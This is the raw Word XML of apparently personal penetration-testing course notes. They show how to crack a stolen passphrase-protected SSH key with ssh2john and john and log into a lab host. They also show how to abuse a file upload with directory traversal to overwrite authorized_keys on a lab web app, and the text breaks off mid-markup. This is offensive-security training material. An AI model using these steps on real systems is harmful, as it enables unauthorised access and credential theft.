      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH Keys that have passphrases and cracking them</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX (27.2.1. Initial Foothold):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's attempt to leverage this key to access WEBSRV1 as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via SSH. To do so, we have to modify the file permissions as we have done several times in this course.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="507" name="image486.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image486.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269"/>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CE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniela@192.168.50.244</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 13 shows that the SSH private key is protected by a passphrase. Therefore, let's attempt to crack it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist. After a few moments, the cracking attempt is successful as shown in the following listing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="154" name="image174.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image174.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId270"/>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CEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa &gt; ssh.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that cracking doesn't work, then take a more elaborate approach to find the mode for cracking:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4174935" cy="3586163"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="333" name="image316.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image316.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId271"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4174935" cy="3586163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ignore the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sshng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the start since it's just a JohnTheRipper tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 15.2.5. SSH Private Key Passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's attempt to access the system again via SSH by providing the passphrase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="312" name="image318.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image318.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27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CF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="769"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniela@192.168.50.244</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Success! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C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8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtt9fpevndk8" w:id="114"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overwriting authorized_keys file using file upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better demonstration of how to inject our new public key into authorized_keys can be see nin the "SSH public key injection attack via authorized_keys file" section</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This basically means we can upload files but we aren't able to execute those files (so we can't upload a PHP shell and then execute it). So here, they give an example of how to upload SSH's authorized_keys file in order to SSH into root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (9.3.2. Using Non-Executable Files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D01">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we'll examine why flaws in file uploads can have severe consequences even if there is no way for an attacker to execute the uploaded files. We may encounter scenarios where we find an unrestricted file upload mechanism but cannot exploit it. One example for this is</w:t>
      </w:r>
      <w:hyperlink r:id="rId273">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId274">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Google Drive</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we can upload any file, but cannot leverage it to get system access. In situations such as this, we need to leverage another vulnerability such as Directory Traversal to abuse the file upload mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D02">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's begin to explore the updated "Mountain Desserts" web application by navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://mountaindesserts.com:8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3060700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 18: Mountain Desserts Application on Windows" id="228" name="image225.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 18: Mountain Desserts Application on Windows" id="0" name="image225.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3060700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 18: Mountain Desserts Application on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D04">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll first notice that new version of the web application still allows us to upload files. The text also reveals that this version of the application is running on Linux. Furthermore, there is no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link at the bottom of the page, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is missing in the URL. Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm whether the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files still exist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
